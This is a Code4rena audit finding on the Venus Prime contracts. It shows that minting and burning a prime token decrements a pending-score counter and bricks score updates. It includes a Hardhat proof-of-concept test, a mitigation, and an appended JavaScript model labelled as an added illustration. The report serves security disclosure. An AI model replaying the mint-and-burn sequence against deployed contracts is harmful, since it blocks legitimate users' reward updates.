Code4rena: CODE423N4:2023-09-VENUS-FINDINGS-ISSUES-586
Date: Oct 04, 2023

Update score system can be bricked

Source: Code4rena (github.com)
Tags: manual review, prime token, reward system, pending scores, update alpha, update multipliers

AI Score: 6.9 Medium (Confidence: Low)

Lines of code

Vulnerability details

Impact

The updateScores function is used to manually update users' scores; the developers explain their reasoning for this in the documentation. Any change to alpha or the multipliers unbalances the reward system because the change cannot be propagated to all users; updateScores allows this change to be propagated.

The issue is that this system can be bricked. If a user who did not have a prime token when the multipliers or alpha changed mints a prime token and then burns it, the variable pendingScoreUpdates is decremented, which means that one of the real pending scores will not get updated. For example, if 10 users do this, then 10 pending scores cannot be updated.

PoC

Add the following in the update score tests of Prime.ts:

it.only("Update score system can be bricked", async () => {
        await xvs.connect(user3).approve(xvsVault.address, bigNumber18.mul(2000));
        await xvsVault.connect(user3).deposit(xvs.address, 0, bigNumber18.mul(2000));

        await xvs.connect(user2).approve(xvsVault.address, bigNumber18.mul(2000));
        await xvsVault.connect(user2).deposit(xvs.address, 0, bigNumber18.mul(2000));

        await mine(90 * 24 * 60 * 60);
        await prime.connect(user3).claim();

        await prime.updateAlpha(4, 5);
       
        const totalScoreUpdatesRequired = await prime.totalScoreUpdatesRequired();
        const pendingScoreUpdates = await prime.pendingScoreUpdates();
        
        // User1 and User3 scores are pending to be updated.
        expect(totalScoreUpdatesRequired).to.be.equal(2);
        expect(pendingScoreUpdates).to.be.equal(2);
        
        // Update score system working properly
        await prime.updateScores([user1.getAddress(), user3.getAddress()]);

        await prime.updateAlpha(1, 2);

        const totalScoreUpdatesRequired2 = await prime.totalScoreUpdatesRequired();
        const pendingScoreUpdates2 = await prime.pendingScoreUpdates();
        
        // User1 and User3 scores are pending to be updated again.
        expect(totalScoreUpdatesRequired2).to.be.equal(2);
        expect(pendingScoreUpdates2).to.be.equal(2);

        await prime.connect(user2).claim();
        await xvsVault.connect(user2).requestWithdrawal(xvs.address, 0, bigNumber18.mul(2000));

        // Now update score system is broken. You can only update either user1 or user3 but not both.
        await prime.updateScores([user1.getAddress(), user3.getAddress()]);
      })

Tools Used

Manual Review

Recommended Mitigation Steps

When burning someone's prime token, do not decrement pendingScoreUpdates.
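
The counter drift and the effect of the recommended change can be reproduced in a small model, added here as an illustration and not taken from the report or from the Venus Prime contracts. The class, its sets and the error string are assumptions; `decrementOnBurn = false` stands for the recommended mitigation.

```javascript
// Simplified model of the counters named in the report. The bookkeeping is an
// assumption for illustration, not the Venus Prime contract source.
class PrimeModel {
  constructor(decrementOnBurn) {
    this.decrementOnBurn = decrementOnBurn; // true = behaviour the report describes
    this.holders = new Set();  // users currently holding a prime token
    this.round = new Set();    // holders counted when alpha/multipliers changed
    this.updated = new Set();  // counted holders already updated this round
    this.pendingScoreUpdates = 0;
  }
  mint(user) { this.holders.add(user); }
  burn(user) {
    this.holders.delete(user);
    // Reported flaw: any burn consumes a pending slot, counted holder or not.
    if (this.decrementOnBurn && this.pendingScoreUpdates > 0) this.pendingScoreUpdates--;
  }
  updateAlpha() { // starts a new round over the current holders
    this.round = new Set(this.holders);
    this.updated = new Set();
    this.pendingScoreUpdates = this.round.size;
  }
  updateScores(users) { // all-or-nothing, like a reverting transaction
    const updated = new Set(this.updated);
    let pending = this.pendingScoreUpdates;
    for (const u of users) {
      if (updated.has(u)) continue;
      if (pending === 0) throw new Error("no pending score updates");
      updated.add(u); pending--;
    }
    this.updated = updated; this.pendingScoreUpdates = pending; // commit
  }
  // Counted holders whose score still reflects the old parameters.
  stale() { return [...this.round].filter(u => this.holders.has(u) && !this.updated.has(u)); }
}
// Constructed scenario following the PoC: user1 and user3 hold tokens, alpha
// changes, then user2 mints and burns before anyone calls updateScores.
function scenario(decrementOnBurn) {
  const p = new PrimeModel(decrementOnBurn);
  p.mint("user1"); p.mint("user3");
  p.updateAlpha();
  p.mint("user2"); p.burn("user2");
  const pendingAfterBurn = p.pendingScoreUpdates;
  let batchError = null;
  try { p.updateScores(["user1", "user3"]); } catch (e) { batchError = e.message; }
  p.updateScores(["user1"]); // a single update always fits
  return { pendingAfterBurn, batchError, pending: p.pendingScoreUpdates, stale: p.stale() };
}
console.log(scenario(true), scenario(false));
```

Comparing `pendingScoreUpdates` with the length of `stale()` is the invariant to watch: in the flawed run the counter reaches zero while user3 is still stale.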

Assessed type

Other

